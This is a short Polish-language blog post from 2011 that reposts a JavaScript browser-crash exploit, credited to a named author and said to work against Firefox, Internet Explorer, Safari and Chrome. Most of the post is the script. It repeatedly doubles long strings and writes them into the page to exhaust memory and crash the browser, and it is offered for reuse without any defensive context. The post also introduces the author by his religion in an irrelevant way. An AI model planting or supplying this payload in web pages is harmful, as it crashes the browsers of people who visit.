Mshtml.dll sploit na FF, IE i Safari teraz na Chrome

Posted: 19 May 2011 in ITsec

Przedstawiciel islamu, Caddy-Dz wyczaił tygodniowego remote sploita, który wywala przeglądarkę również dla Google Chrome:

function boom()
{
var longunistring1 = unescape(“%u4141%u4141”);
var longunistring2 = unescape(“%u4242%u4242”);
var longunistring3 = unescape(“%u4343%u4343”);
var longunistring4 = unescape(“%u4444%u4444”);
for(i=0; i <= 999 ; ++i)
{
longunistring1+=longunistring1;
longunistring2+=longunistring2;
longunistring3+=longunistring3;
longunistring4+=longunistring4;
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
}
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
document.write(document.body.innerHTML);
}
var objectSource = boom();

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s